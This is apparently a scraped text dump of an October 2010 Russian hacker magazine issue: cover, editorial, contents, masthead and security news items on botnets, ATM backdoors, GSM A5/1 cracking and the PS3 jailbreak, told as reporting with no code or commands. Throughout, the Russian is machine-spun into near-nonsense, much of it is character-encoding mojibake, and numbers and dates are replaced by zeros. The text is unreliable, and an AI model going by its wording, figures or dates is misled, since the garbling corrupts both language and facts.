= Скачать прогу шилд хаб. Xakep 10 (141) 2010 by Viktor Melician - issuu

СТР.

08

Я

x 00 (ОКТЯБРЬ) 0010

А
НН
ВА р.
ДО 010
ЕН :
М НА
КО ЦЕ
РЕ

ТУЛКИТ ДЛЯ СОЦИАЛЬНОЙ ИНЖЕНЕРИИ

ОКТЯБРЬ 00 (141) 0010

НОКАУТ ДЛЯ AOL/ РУТОВЫЕ ПРИВИЛЕГИИ НА СЕРВЕРЕ КОРПОРАЦИИ AOL

ÍÎÊÀÓÒ
ÄËß AOL

CALLBACK:
ÝÊÎÍÎÌÈß
ÍÀ ÑÂßÇÈ
ÑÒÐ. 04

ÐÓÒÎÂÛÅ
ÏÐÈÂÈËÅÃÈÈ
ÍÀ ÑÅÐÂÅÐÅ
ÊÎÐÏÎÐÀÖÈÈ AOL
ÑÒÐ. 06

041

METASPLOIT FRAMEWORK
ÂÅÁ-ÊÀÌÅÐÀ
ÍÀ ÑÅÐÂÎÏÐÈÂÎÄÀÕ
ÊÐÓÃÎÂÀß ÎÁÎÐÎÍÀ LINUX
ÄÅÑÊÒÎÏÀ
ÂÑÊÐÛÂÀÅÌ ÕÈÒÐÛÉ SALITY.AA
ÂÛÁÈÐÀÅÌ ËÅÃÊÎÂÅÑÍÎÅ
VPN-ÐÅØÅÍÈÅ

ÍÀØÈ
ÍÀ HITB
ÊÎÍÔÅÐÅÍÖÈß
HACK IN THE BOX
ÎÒ ÏÅÐÂÎÃÎ ËÈÖÀ
ÑÒÐ. 04

*

INTRO

В прошлом месяце наш брат со Степом да Пандой Горл ездили
нате Chaos Constructions: в главный раз следовать эпоха проведения
сего мероприятия. Не подумай, зачем у нас появился
великий внимание для демосцене — причиной поездки
стала шибко солидная блок презентаций объединение ITбезопасности, которую представляли, во часть числе, трое
наших авторов: Лексей Синцов, Димитрий Евтеев равным образом
Володя Воронцов. На CC весь на этом году собралась
большая сборище увлеченных ИБ людей, а многие с
спикеров могли бы пятерка накатиться сверху уровне больших
международных конференций.
В общем, турне была супер: послушали отличные

презентации равно суперски попили пива. А самое главное:
появилось ощущение, зачем усилиями организаторов CC во
России появляется большая, интересная конфа, которая
способна на будущем видоизменяться нет слов отчего-то уровня даже если никак не
Defcon равно BlackHat, то, за крайней мере, HITB :).
nikitozz,
гл. ред. Х
udalite.livejournal.com
http://vkontakte.ru/club10933209
* Что сие следовать штука? Все без затей — сие «живая 0D метка», которую
с открытыми глазами с целью нашего журнала сделала общество EligoVision.
Заценить ее аспидски просто: возьми из нашего DVD либо соответственно
адресу www.xakep.ru/3dmarkers/ программу подо Windows
alias Linux, поднеси ревю ко своей web-камере равным образом твоя милость увидишь,
в качестве кого журнальная сторона оживет да бери месте метки появится
забавная трехмерная анимация.
Узнать более об компании EligoVision равным образом скачать иные 0d-метки
не грех нате сайте www.eligovision.ru.

aa Nod32. или приятная еда адреналина? Большой FAQ 8. отравляющие жизнь. Avira: проверим их получай стрессоустойчивость Учимся разглядеть полиморфизм да обфускацию кода для примере известного вируса История компании Parallels ÞÍÈÊÑÎÉÄ 086 Òåðìîÿäåðíûé ñèíòåç 092 Ïëþñ 000 ê çàùèòå 098 Îñîáåííîñòè íàöèîíàëüíîé êîíñïèðàöèè 103 Ñàìûé ìàëåíüêèé VPN Обзор патчей с целью Linux. далеко не входящих во ванильное ядро Круговая защита Linux десктопа Шифруем диски вместе с через LUKS/dm-crypt. фобии да их вариации: эмоции. Windows Sеrver 0003 Семь равным образом сызнова безраздельно дорога подать сисадмина лещадь монастырь ÞÍÈÒÛ 134 PSYCHO: Áîÿòüñÿ íåëüçÿ èãíîðèðîâàòü 140 FAQ UNITED 143 Äèñêî 144 WWW2 Страхи. TrueCrypt равным образом EncFS Выбираем простое да легковесное VPN-решение ÊÎÄÈÍà 108 Êîäèì íà Python ïî-ôóíêöèîíàëüíîìó 112 WTF WCF? 116 Ñàìîïàëüíûé MSN-êëèåíò íà ñèøàðïå 119 Ïðîãðàììåðñêèå òèïñû è òðèêñû Познаем силу функциональной парадигмы программирования Windows Communication Foundation: сложные транзакционные системы по-быстрому Готовим почву для того создания антиамериканского IM-спамера Спецвыпуск: трюки интересах (не очень) начинающих системщиков SYN/ACK 122 «Æèâîé» áýêàï ëèíóêñîâîãî ñåðâåðà 126 ×òî íîâîãî â AD CS? 130 Ðèñêè ñèñòåìíîãî àäìèíèñòðàòîðà SET — самолучший комбинация гениального хакера Мировые успехи элитного взлома Ïàðàëëåëè IT-áèçíåñà Обзор средств чтобы резервного копирования и создания LiveDVD/LiveUSB Certificate Services во Windows Server 0008 R2 vs.CONTENT MegaNews ÑÖÅÍÀ 004 080 Все новое из-за завершающий месяц FERRUM 016 Íîóòáóê-áàìáóê 018 Ìåäèàïëååðû BBK 020 Ïàìÿòêà äëÿ AMD Обзор ноутбука ASUS U43Jc Обзор линейки HD-плееров Тест памяти DDR3 PC_ZONE 025 Êîëîíêà ðåäàòîðà 026 Âèçóàëüíûé ïðîãðàììèíã 030 Âåá-êàìåðà íà ñåðâîïðèâîäàõ 034 Ñáåðå÷ü òåëåôîííûé áàëàíñ Что может выболтать реестр? Конструируем приложения из через HiAsm Совмещаем азбучная истина шифр да ферро из через Arduino Поднимаем систему обратного дозвона Callback ÂÇËÎÌ 038 Easy-Hack 042 Îáçîð ýêñïëîèòîâ 048 Ñîöèàëüíàÿ ðåàëüíîñòü 054 Íàøè íà HITB 060 Ëàáîðàòîðíûé ïðàêòèêóì ïî Metasploit Framework 066 Íîêàóò äëÿ AOL 070 X-Tools Хакерские секреты простых вещей Разбираем свежие уязвимости Скрытые фишки MSF Получаем льготы рута нате сервере корпорации AOL Программы пользу кого взлома MALWARE 072 Êðàø-òåñò àíòèâèðóñîâ: òðîéíàÿ ïåíåòðàöèÿ 076 ][-ïðåïàðàöèÿ: âñêðûâàåì õèòðûé Sality.5 Гб всякой всячины Удобные web-сервисы . Avast.

ru) >Редактор Unix-раздела Антон «Ant» Жуков >Монтаж видео Максим Трубицын /PUBLISHING >Ó÷ðåäèòåëü ÎÎÎ «Ãåéì Ëýíä».пишите по адресу: 0 (800) 000. 01.ru) /DVD >Выпускающий редактор Степан «Step» Ильин Ìîñêâà. По вопросам лицензирования да получения прав нате пользование редакционных материалов журнала обращайтесь в соответствии с адресу: Москва.ru) >Руководитель отдела подписки Гончарова Марина >Руководитель спецраспространения Лукичева Наталья >Âûïóñêàþùèé ðåäàêòîð Николай«gorl»Андреев UNIXOIDи PSYCHO Àíäðåé «Andrushock» Ìàòâååâ > Ãîðячая ëèíèя ïî ïîäïèñêå òåë.ru) > Претензии равным образом дополнительная инфа: В случае возникновения вопросов по качеству вложенных дисков Ìíåíèå ðåäàêöèè íå îáÿçàòåëüíî ñîâïàäàåò ñ ìíåíèåì àâòîðîâ. 04-45 Тел. Òèðàæ 000 000 ýêçåìïëÿðîâ.xakep. факс: (495) 080-8824 >Директор соответственно Дистрибуции Кошелева Татьянка Ðåäàêöèÿ íå íåñåò îòâåòñòâåííîñòè çà ñîäåðæàíèå ðåêëàìíûõ îáúÿâëåíèé â íîìåðå.ru) >Старший трафик-менеджер Марья Алексеева РФ. 0010 .ru) >Ëèòåðàòóðíûй ðåäàêòîð Юлия Адасинская >Редактор xakep. д.ru Леонид Боголюбов /ART >Àðò-äèðåêòîð Евгений Новиков (novikov.xakep.ru) >Работа вместе с рекламными агентствами Лидия Стрекнева Îòïå÷àòàíî â òèïîãðàôèè «Lietuvas Rivas».999 Áåñïëàòíî äëÿ çâîíÿùèõ èç Ðîññèè > Äëя писем 101000.ru) >Менеджеры Ольга Емельянцева Мария Нестерова Мария Николаенко >Менеджер в соответствии с продаже Gameland TV Марина Румянцева Öåíà äîãîâîðíàÿ. Ãëàâïî÷òàìò. стр.ru) ÊÎÄÈÍÃ.ru) >Верстальщик Вера Светлых 019021.xakep. факс: (495) 080-8824 >Директор группы GAMES & DIGITAL Евгения Горячева èñïîëüçóþùèå äàííóþ èíôîðìàöèþ â ïðîòèâîçàêîííûõ öåëÿõ.xakep. ìîãóò áûòü ïðèâëå÷åíû ê îòâåòñòâåííîñòè. Klouniz» Лозовский /ОТДЕЛ РЕАЛИЗАЦИИ СПЕЦПРОЕКТОВ >Директор Александр Коренфельд Õàêåð Çàðåãèñòðèðîâàíî â Ìèíèñòåðñòâå Ðîññèéñêîé Ôåäåðàöèè ïî äåëàì ïå÷àòè.ru) >Ðåäàêòîðû ðóáðèê ÂÇËÎÌ Дмитрий«Forb» Докучаев Тимура Фрунзе. Ðåäàêöèÿ óâåäîìëÿåò: âñå ìàòåðèàëû â íîìåðå ïðåäîñòàâëÿþòñÿ êàê èíôîðìàöèÿ ê ðàçìûøëåíèþ.: (495) 035-4034. MALWARE равно SYN/ACK Александр «Dr.ru) PC_ZONE равно UNITS Степан «step» Ильин © ÎÎÎ «Ãåéì Ëýíä».3. Ëèöà.: (495) 035-7034. Литва.: +7 (495) 035-7034 Факс: +7 (495) 080-8824 >Генеральный дèðåêòîð Äìèòðèé Àãàðóíов >Óïðàâëÿþùèé äèðåêòîð Äàâèä Øîñòàê >Äèðåêòîð ïî ðàçâèòèþ Ïàøà Ðîìàíîâñêèé >Äèðåêòîð ïî ïåðñîíàëó Татьяна Гудебская >Ôèíàíñîâûé äèðåêòîð Анастасия Леонова >Редакционный директор Дмитрий Ладыженский >PR-менеджер Наталья Литвиновская >Директор сообразно маркетингу Дмитрий Плющев >Главный дизайнер Энди Тернбулл >Директор в области производству Сергей Кучерявый /ÐÅÊËÀÌÀ / Тел. òåëåðàäèîâåùàíèþ è ñðåäñòâàì ìàññîâûõ êîììóíèêàöèé ÏÈ ß 07-11802 îò 04 ôåâðàëÿ 0002 ã. ул.ru) >Менеджеры Александр Гурьяшкин Светлана Мюллер Татьяна Яковлева /РАСПРОСТРАНЕНИЕ: / Тел. Ðåäàêöèÿ â ýòèõ ñëó÷àÿõ îòâåòñòâåííîñòè íå íåñåò. à/ÿ 052.066 Íîêàóò äëÿ AOL Мировые успехи элитного взлома 030 Âåá-êàìåðà íà ñåðâîïðèâîäàõ Совмещаем беспритязательный адрес да аппаратное обеспечение вместе с через Arduino 108 054 Êîäèì íà Python ïî-ôóíêöèîíàëüíîìó Познаем силу функциональной парадигмы программирования Íàøè íà HITB Мировые успехи элитного взлома /ÐÅÄÀÊÖÈЯ >Ãëàâíûé ðåäàêòîð Íèêèòà «nikitozz» Êèñëèöèí >Старший менеджер Светлана Пинчук >Менеджеры Надежда Гончарова Наталья Мистюкова >Директор группы спецпроектов Арсений Ашомко Çà ïåðåïå÷àòêó íàøèõ ìàòåðèàëîâ áåç ñïðîñà — ïðåñëåäóåì.

RU MEGANEWS ÎÁÎ ÂÑÅÌ ÇÀ ÏÎÑ ËÅÄÍÈÉ ÌÅÑßÖ ÏÐÅÂÐÀÙÀÅÌ ETHERNET  WI-FI Буйство технологического прогресса на глазах набирает обороты. Эта «шайтан-коробка» позволит тебе вместо Ethernet-кабеля пустить в ход Wi-Fi 002. тот или иной сейчас вынужден скрытничать свое местонахождение. решила утаить незабвенная Пиратская группа Швеции. гарантирована помощь в уровне властей Швеции) — далеко не успел возлюбленный доделать условия во Швеции и слететь страну. например. Разумеется. малоудобно равно неспортивно. а вот и все пообещали посильную помощь в отражении юридических нападок. сам по себе выгода равно его деятель Джулиан Эссенж сильно мешают ютиться властям США. на свою очередь. медиаплеер либо — либо консоль. Зачем сие нужно Пиратской партии? В Швеции быстро избрание на парламент. Не нужны ему равным образом диски со драйверами — по причине технологии Netgear Push ‘N’ Connect подключение происходит равно как акция plug-and-play. Но как подружить технику со Wi-Fi? Обычно не без; этим возникают проблемы: начинается шаманство с бубнами. Согласись. И шелковица же. подлинно никак не помешает подпора (если «пираты» пройдут во парламент. скажем. перепрошивки. WNCE2001 поддерживает по существу любые девайсы с интерфейсом Ethernet получи и распишись борту равным образом моментально «найдет поголовный язык» из роутером. роскошно работая да через USB. в духе постыдно прославленный сайт WikiLeaks опубликовал на своих страницах файлы что-то около называемого «афганского досье» (десятки тысяч секретных военных документов. равно нам однако чаще приходится встречать из ситуациями. фактически. Вотан изо способов решения этой задачки — трансформатор соответственно имени Netgear Universal WiFi Internet Adapter (WNCE2001). ÇËÎÊËÞ×ÅÍÈß WIKILEAKS После того. когда к Сети нужно отвести далеко не безвыгодный комп. чтобы следовать считанные минуты «подружить» технику со беспроводный сетью. что они появились на архи «интересное время». Ну и. «пиратам» как и нужен пиар :). На прилавках магазинов плата появится уже этой по осени в области цене где-то 0000 рублей.MEGANEWS МАРИЯ «MIFRILL» НЕФЕДОВА MARIA. матерщина равным образом прочие «радости». а предписание был с соблюдением всех формальностей отозван. поддерживающим технологию Wi-Fi Protected Setup (роутеры кроме WPS со адаптером также скрестить можно. Поддержку Эссенджу. рассказывающих об реальной ситуации на Афганистане). ему. 004 XÀÊÅÐ 00 /141/ 00 . ÷òî øðèôò Verdana íàèáîëåå áåçîïàñåí äëÿ çðåíèÿ. симпатия далеко не требует дополнительного питания. в чем дело? держи титул Эссенджа выдан ордер. телевизор. Джулиан дистанционно опроверг сии обвинения. Основателя WikiLeaks обвинили на изнасиловании равным образом сексуальных домогательствах. прислав e-mail на редакцию газеты Dagens Nyheter. а. что объединение волшебству. а опять же заметил. несложно сие отнимет незначительно лишше времени). в духе руководство объявили. Плюсов у гаджета ото Netgear конечно. шведы сняли от него подозрения. Эти отчаянные народище предложили давать приют на своем хостинге серверы WikiLeaks. Джулиану Эссенджу.11n. Ó÷åíûå èç Ëàáîðàòîðèè çðèòåëüíîé ýðãîíîìèêè ÑØÀ âûÿñíèëè. сии ребята воистину радеют следовать свободу информации. горбатиться провод во и оный и другой девайс в доме накладно.

.

что Jailbreak да празднество с оператора попадают под категорию «подозрительных действий» чуток ли не во первую очередь. Apple хорош имеет все основания сконцентрировать информацию в отношении юзере. запрещающего дозор технических средств защиты от неавторизованного использования. Делается все это. однако упиралось лишь в деньга — Butterfly продавался (и продается) в Сети сообразно цене $500–1.взлом софта. Представители ФБР подчеркивают. заюзать его был способным приблизительно каждый. кисло напоминает. в духе твердыня гаджетов от кражи (предусмотрено инда уведомление владельца аппарата путем SMS.обход защиты через копирования DVD-дисков. а самого автора злосчастного инструментария — 03-летнего хакера Iserdo (его имя все еще далеко не разглашается). равно хоть заблокировать девайс равным образом уничтожить не без; него информацию. .FakePlayer. что-то такие девайсы вышли из обращения alias паче безвыгодный производятся. кой на будущем позволит им изучать несанкционированных пользователей. Apple. в духе Mariposa. равным образом какое расправа ему грозит. залоченный перед определенную сеть. По сути.S. Тулкит сумел стать одним с популярнейших на своем роде. вслед за которые Apple безвыгодный отвечает. Зафиксировав «подозрительные действия». конечно. и тысячи вредоносных программ. равно неизвестно. так как к его использования неграмотный нужно было быть «кулхацкером» да характеризоваться специальными навыками alias глубокими познаниями. что-нибудь Jailbreak для iPhone об эту пору легален. Ñâÿòî ìåñòî ïóñòî íå áûâàåò — ïîÿâèëñÿ ïåðâûé SMS-òðîÿí ïîä Android OS. краткосрочного использования материала про создания новых работ. а также в общеобразовательных целях. Более того. пишущий сии строки арестовали того типа. защищенного аппаратным ключом. Пока так тому и быть следствие.300. товарищество подала заявку сверху пудлингование нового патента. который-нибудь вломился во ваш дом. приблизительно на правах джейлбрейкинг может привести к самым разным «нестабильностям» во работе аппарата. на свою очередь. и получи и распишись заданный минута некто отпущен подо залог. ÍÀÉÄÅÍ È ÀÐÅÑÒÎÂÀÍ ÀÂÒÎÐ «ÁÀÁÎ×ÊÈ» Инструментарий «Бабочка» (Butterfly) — штука широко известная на узких кругах. . какой продал ему лом. бесстрастно безграмотный разрешенный к использованию оператором другими словами производителем телефона. что-то сие первый арест самый автора набора вредоносных программ. равным образом хоть взламывание защиты DVD может бытовать ненаказуем. позволяющие использовать телефон. около условии. предуготовить местонахождение устройства (и самого пользователя). Copyright Office) рядом Библиотеке Конгресса рассматривает да одобряет исключения с федерального закона. И чисто с Штатов пришла удивительная новость: ФБР сообщило. которые ноль без палочки не крал. что. в противоположный сети. подробную карту местности равно изображение самых богатых домов в округе». Американские администрация нечаянно признали легальными следующие вещи: .AndroidOS. да важно сообщают: «Вместо чело- 006 века. позволяющие совать на телефоне софт. Èíôåêöèÿ ïîëó÷èëà îáîçíà÷åíèå Trojan-SMS. критики другими словами комментирования. В этом году наравне в один из дней состоялось очередное рассмотрение. твоя милость до сей времени в равной степени лишаешь его гарантии.взлом защиты игр (DRM) во целях поиска уязвимостей. равным образом были приняты новые поправки для закону о защите прав во цифровую эпоху. . может безвыгодный поздоровиться — мастерство во том. сколько им совместно вместе с полицией Словении да Испании посчастливилось выкопать равно арестовать отнюдь не очередного оператора Butterfly-ботнета. .MEGANEWS ËÅÃÀËÈÇÀÖÈß ÄÆÅÉËÁÐÅÉÊÈÍÃÀ È ÍÅ ÒÎËÜÊÎ В США глотать одна интересная «традиция» — каждые три лета Бюро в соответствии с авторским правам США (The U.программы. подина благовидным предлогом — сие отнюдь не зачем иное. e-mail или голосовой почты). На основе «Бабочки» были созданы сотни ботнетов. Таким образом получается. совершающих «подозрительные действия» со своими аппаратами.программы. включая такие гигантские зомби-сетки. при условии легального. Парня арестовали в Мариборе с вместе с уже двумя подозреваемыми. взламывая свой смартфон. XÀÊÅÐ 00 /141/ 00 . какие вот поэтому и есть обвинения будут предъявлены Iserdo. Однако равно обычным джейлбрейкнутым аппаратам.

.

купив с аукциона банан банкомата компаний Tranax Technologies и Triton на личное пользование. точно разобрав их соответственно винтику и собрав обратно. Информацию о найденных уязвимостях Барнаби заблаговременно передал производителям банкоматов. начинающийся со строки «EIOWJE». Обе модификации получили новые 0-дюймовые дисплеи от разрешением 000x800 пикселей. пират эврика неуд новых способа извлечь с них заветные деньги бумажки. теперь он равен 0 Гб (то есть. да это по его части сообразно сетный безопасности. $88. а проворство перелистывания страниц улучшилась бери 00%.500 электронных книжек). ïîäíÿâøåé ïèðàòñêèå ñåðâåðû äëÿ èãðû WoW. когда-когда вредоносный софт использует социальные тенета другими словами некоторые люди популярные сервисы на качестве «командного пункта».. а гляди Tranax Technologies хранит подозрительное молчание. который материнская плата Triton оказалась защищена стандартным (не уникальным) ключом. чтобы облегчить бытие себя да осложнить ее другим. во вкусе справедливо с названия. Изучая троян изо семейства «Brazilian Banker». Габариты обоих моделей 008 теперь равны 090x122x8 мм. заразив машину пользователя. специалисты из RSA’s FraudAction Research Lab обнаружили. После указанной строчки в профайле шла зашифрованная инструкция. Цена читалок. С через телефонного модема да Dillinger можно получить неограниченный ход для системе не принимая во внимание необходимости ввода пароля. в эту пору представленные на графитовом цвете. Провозившись вместе с машинами более года. Сильные изменения претерпели равно корпуса девайсов.393 Àñòðîíîìè÷åñêóþ ñóììó. тот или иной изучатель ровно купил в Сети из-за 00 баксов. Вызвать «к жизни» засланный и надежно упрятанный через «глаз» операционной системы бэкдор позволено либо специальной картой. В аппарате Tranax Technologies Барнаби обнаружил критическую небезукоризненность удаленного доступа. во свою очередь. ìëí. XÀÊÅÐ 00 /141/ 00 . В банкомат Triton.. «работает» по банкам Бразилии равным образом Латинской Америки. названо отнюдь не было. Но грубо уменьшилось. ощутимо снизилась да в эту пору составляет $139 ради модификацию со Wi-Fi да $189 из-за 0G + Wi-Fi модель. Моделей всего две: Kindle Wi-Fi да Kindle 0G + Wi-Fi. «инфекция» лезла в социальную интернет да искала в дальнейшем профиль. которую троянец дешифровал равно принимался исполнять. Похоже. Çà êàæäîãî èç èãðîêîâ æåíùèíó îøòðàôîâàëè íà . ËÅÃ×Å. И это уже в некотором расстоянии неграмотный узловой случай. бражка Triton быстро приняла меры. для читалку войдет порядка 3. Джек Барнаби. либо нажатием определенной комбинации кнопок. Увы. Электронные книжки заметно похудели — упитанность уменьшилась на 21%. Для управления трояном во «социалке» был создал фейковый аккаунт в соответствии с имени «Ana Maria». а достоинство составляет 041 грамм. а во уж установленные аппаратура дать новую жизнь поперед этих пор далеко не соизволили. вызнать что до которых ему удалось. что управляется малварь нетривиальным способом.. потому что до методах взлома бредить не запрещается всего лишь с его слов. ÍÎÂÛÉ KINDLE — ÌÅÍÜØÅ. который их контрастность нате целых 50% превосходит контрастность других ебуков (контраст стал 00:1 за старых 0:1).5 427. а также экраны невыгодный бликуют да порадуют юзеров побольше четкими да темными шрифтами. в открытый приступ приманка наработки симпатия тратить не стал. Чего всего-навсего невыгодный сделаешь. Amazon гордо сообщает. То есть. êîìïàíèÿ Blizzard îòñóäèëà ó àìåðèêàíêè Ýëèñîí Ðèâç. который. а эдак да приросло — вырос диапазон встроенной памяти. но в приведенных скриншотах многие опознали Orkut). для использования которой написал эксплойт Dillinger. с намерением угнаться за Nook. перед этих пор по установленной форме недоступных в России. а месиво — держи 07%.MEGANEWS ÓÏÐÀÂËÅÍÈÅ ÒÐÎßÍÎÌ ×ÅÐÅÇ ÑÎÖÈÀËÜÍÓÞ ÑÅÒÜ Чего лишь только отнюдь не придумают хакеры равно вирусмейкеры. На Black Hat Барнаби поведал что касается новых способах взлома банкоматов. $200 ÎÐÈÃÈÍÀËÜÍÛÉ ÏÎÄÕÎÄ Ê ÂÇËÎÌÓ ÁÀÍÊÎÌÀÒΠНа на днях состоявшейся во Лас-Вегасе конференции Black Hat было беда сколько интересных докладов равно выступлений. Дело во том. Не обошли вниманием равно софтверную составляющую: теперь Kindle комплектуются улучшенным просмотрщиком документов PDF равным образом новым экспериментальным браузером получай основе отметина WebKit. в чем дело? Tranax закрыли «дырку» во новых ATM. ÁÛÑÒÐÅÅ Amazon во появляющийся раз в год по обещанию обновил приманка электронные книжки: вдогон из-за новым Kindle DX вышли и обычные Kindle третьего поколения. удалось насадить бэкдор Scrooge (тоже написанный самим Барнаби). В качестве админки вредоносная софтина использовала социальную яруча (какую именно. сумел выделиться даже если нате этом фоне. во профиль которого во виде обычного текста были загружены зашифрованные инструкции ради зловреда.

ru.xakep. тем пуще у тебя шансы выгадать крутые призы! . Покажи себя на деле — равно выиграй поездку во США на конференцию Lotusphere на январе 0011 года! Все.ru X-testing сontest Журнал Хакер представляет соревнование сообразно поиску багов во бета-версии IBM Lotus Symphony 0.>> coding lotus. Дальше весь зависит с тебя: нежели больше и интересней ошибки твоя милость найдешь. что-нибудь нужно про участия на конкурсе — установить Lotus Symphony Beta 0 да сочетаться браком сверху сайте lotus.xakep.

только текущий судебное дело был весьма долог. что-нибудь столп PlayStation 0 наконец-то дала серьезную трещину. а темп на работе криптографического софта решает все. ÇÀÙÈÒÀ PS3 ÏÀËÀ Интересные новости в целях геймеров — команды сайтов psx-scene. который. а там.MEGANEWS GSM-ÑÅÒÈ ÎÏÓÒÀË «ÊÐÀÊÅÍ» В прошлом номере да мы вместе с тобой писали об умельцах. заново же. клеймящий согласно всему. зачем взлом A5/1 был возможен равным образом ранее. отнюдь не ровен час.и SLIM-версий да всех регионов. Она держалась три года! Почти историческое событие :). «стирание»). материал почти моментально уничтожались. Цена донгла непостоянно «кусается»: на среднем возлюбленная составляет $130 из-за штуку. Kraken работает не без; радужными таблицами общим объемом 0. Впрочем. Благодаря девайсу PS Jailbreak. да восточные братья выпустят в продажу готовые наборы. Но. Теперь. Сегодня позволь рассказать тебе касательно группе независимых разработчиков открытого ПО. однако безвыездно сие ранее далеко не отменит того факта. погружать бекапы со встроенного жесткого диска равным образом помещать получай модильон пиратское ПО. Наверняка в скором времени Sony закроет эту уязвимость. Новая система автоматического удаления данных со жестких дисков получила говорящее заглавие Wipe («уничтожение». тем безвыгодный менее. ÷òî ó 05% ïîëüçîâàòåëåé ïàðîëü îò ïî÷òîâîãî ÿùèêà ñîâïàäàåò ñ ïàðîëåì ê àêêàóíòàì â ñîöèàëüíûõ ñåòÿõ. Разработчики «Кракена» объясняют. SED). Принимающий участие во проекте криптограф Карстен Нол заявил: «Ситуация около GSM-хакинга не долго думая входит в стадию скрип-киддисов. Факт взлома доподлинно подтвержден парнями с PSX Scene (на их сайте очищать видео). использующийся во Skype. стирается. Никаких гарантий разработчики. ничтоже сумняшеся лежит на открытом доступе. экой именно эксплойт использует PS Jailbreak. равным образом у него появятся клоны. равным образом утилиту AirProbe. любой. которые наделали несть шума. равным образом прибегнуть им. генерируется самим «винтом». идеже можно приобрести задушевный чип. Дело на том. отнюдь не желая попасть под суд. используемый в большинстве GSM-сетей. вскрыв алгорифм шифрования RC4. сколько достаточно купить предрешаемый радио-модуль в целях ПК и взять получай военизация Kraken вместе с криптографическими таблицами равно Airprobe. что и для без году неделю состоявшейся конференции Defcon тоже был показан грошовый (около $1. что ее не грех настроить таким образом.com рапортуют. дабы пусть даже в случае банального отключения питания компьютера или рядом изъятии с него жесткого диска. которыми шифруются SMS и переговоры. тем самым обманывая таксофон да принуждая его «поделиться» информацией об активном звонке. беспричинно как бы неизвестно. конечно. способную открыть алгорифм шифрования A5/1. уже тем более. позволяющую писать равно дешифрировать собеседование и SMS. Интересно. дать на лапу целое нужное может. неграмотный нужно совершать над HDD физической расправы. что несколько парение вспять происходило вместе с Wi-Fi-сетями — тогда почитай постоянно стали пытались разворотить соседский Wi-Fi. которую разработчики безграмотный предоставляют. что-то работает сие всего-навсего возьми debug-версии PS3. чип подешевеет. Для фактической прослушки чужих переговоров. равным образом во случае какого-либо ЧП отпирка шифрования. представляющему из себя USB-донгл. хотя во Сети курсируют слухи. Как сие работает? Просто и изящно: новость держи HDD хранится во зашифрованном виде. В случае со Wi-Fi шифровка сменили получи и распишись WPA и. Êîìïàíèÿ BitDefender ñ ãðóñòüþ ñîîáùàåò.7 Тб. ась? Kraken. выпустив новаторство прошивки. что-нибудь не без; GSM произойдет так а самое». во торрентах). когда-когда Kraken доработан. заявлена помощь FAT. Новая порядок будет реализована держи накопителях Toshiba вместе с поддержкой аппаратного шифрования данных (Self-Encrypting Drive. взять равно утверждают. ваш покорный слуга надеюсь. у него уходит с 00 секунд давно туман минут. Автор устройства. для сайте psjailbreak. И никакого тебе медленного равно мучительного удаления данных и. Но никаких сверхтребований для аппаратной части нет. которые доступны на Сети на открытом доступе (в частности. на набор ключей. непосредственно для конференции продемонстрировал работу девайса да объяснил принцип его работы: ловелас маскируется под обычную вышку-ретранслятор путы оператора AT&T. завоевать которые можно хорошенького понемножку следовать символическую плату во онлайн-магазинах (подобными китами для того Wi-Fi-сетей приторговывают давно). Крис Пагет. В ходе конференции Black Hat сии ребята представили миру свои наработки — систему Kraken. 010 XÀÊÅÐ 00 /141/ 00 . понадобится единаче равно «железная» составляющая.com и ozmodchips. стало что созидать дампы игр. что их ПО совсем работоспособно.500) прототип перехватчика разговоров во GSM-сетях. а да получить причастность на его доработке да улучшении может фактически каждый. сие малограмотный останавливает покупателей — у многих дистрибьюторов сделано разобрали всё запас. Основная выдумка Wipe на том. так же в духе равно AirProbe. ÀÍÍÈÃÈËßÒÎÐ ÄÀÍÍÛÕ ÎÒ TOSHIBA Компания Toshiba поведала миру касательно своей новой разработке на области защиты информации. напоминаем. сие манером тому. равным образом получи и распишись модчип образовалась очередь. Опровергнуть или подтвердить сей молва нонче ни одна собака далеко не может.com. что защиту PS3 сумели взломать. Ногл рассказал. невыгодный дают. возглавляемой норвежским программистом Фрэнком Стивенсоном. анонсированных с грехом пополам ранее.

Прогрессивная методика покупки игр Представь себя ситуацию. Что сие значит? Очень просто: сделано безотлагательно появляются на электронном виде быстрее. с целью бросать на гостиный двор многие геймеры стали завоевывать зрелище неуклонно на Интернете. скачать. Компания никак не только лишь создала саму технологию. поскольку издатель безграмотный тратится для действие дисков равно доставку во магазины. XÀÊÅÐ 00 /141/ 00 Вот если бы бы примолвить семо «потоковое вещание». рано или поздно на последний раз покупали диски. так чтобы дальнейшая закачка проходила незаметно равным образом помимо тормозов.TV. Пока стянешь тяжелую игру (а это легко может завладеть 0-10 часов). Дальше. был создан механизм PlayFast (www. твоя милость получишь стартовый «пирог» равным образом начнешь выступать допускается сейчас чрез малость минут. позволяющие пригодно купить. Удобные сервисы Steam равно Xbox Live Marketplace. пятеро — правда возьми хоть всю подборку сразу. которые предлагаю разработчики в своем сайте. пропадет всякое вожделение во нее играть. Увы. так от сего места но переписывать самочки игры. Игры во PlayFast безвыгодный варез. в соответствии с мере необходимости. Еще каких-то цифра парение назад. Продавцы игр и безграмотный стояли во стороне: где бы того. Бестолковые онлайн-магазины сменились удобными сервисами вроде Apple. Такие технологичные причуда я любим :). Заплатить из-за них дозволяется любым удобным способом — СМСкой. образ пока фантастическая. увесистого дистрибутива Starcraft II равным образом одновременно наваливаться ко его прохождению.. Каталог без устали растет. И говорок тогда пусть даже малограмотный по части пресловутых torrent’ах. с тем аллегро скачать 0 Гб дистрибутив свежей новинки. Большая делянка зрелище докачивается неуловимо в фоновом режиме. К тому а на пороге покупкой любую гамесу можно полноценно пощупать. установить любую экшн другими словами стратегию. ИЛИ LEVEL UP ДЛЯ ИГРУШЕК На нашем DVD твоя милость найдешь пример дистрибутива игры. на в таком случае времена вроде твоя милость сделано давно играешь. Ребята из Digital Solutions нашли выход. когда скорости соединения подросли. но еще равным образом ощутимые денежки для покупке. же на смену муторного ожидания конца установки. распространяемого через технологию PlayFast. Ребята изо немецко-русской компании Digital Solutions реализовали такую фишку ради игр. же сие просто-напросто для того операционок. Все некогда начиналось от продажи лицензионной музыки. у нас а — каналы сей поры безвыгодный такие широкие. скажем. Мастер ставит всего самое необходимое. нежели во магазине. ни за что никак не мешая геймплею. зачем распространяются сквозь перспективный уловка закачки. Но ведь запад.PLAY FAST. максимум удобства. вследствие любую платежную систему. Что приятно: во среднем хиханьки да хаханьки достаточно получи и распишись 00-30 процентов дешевле. Это совсем лицензионные игрушки. позволяющие скачать чуть 0-10%.playfast. идеже не запрещается намозолить глаза любую новинку (хотя да зачастую хреновато поломанную). необходимые ради того. В результате отсюда следует затягивать 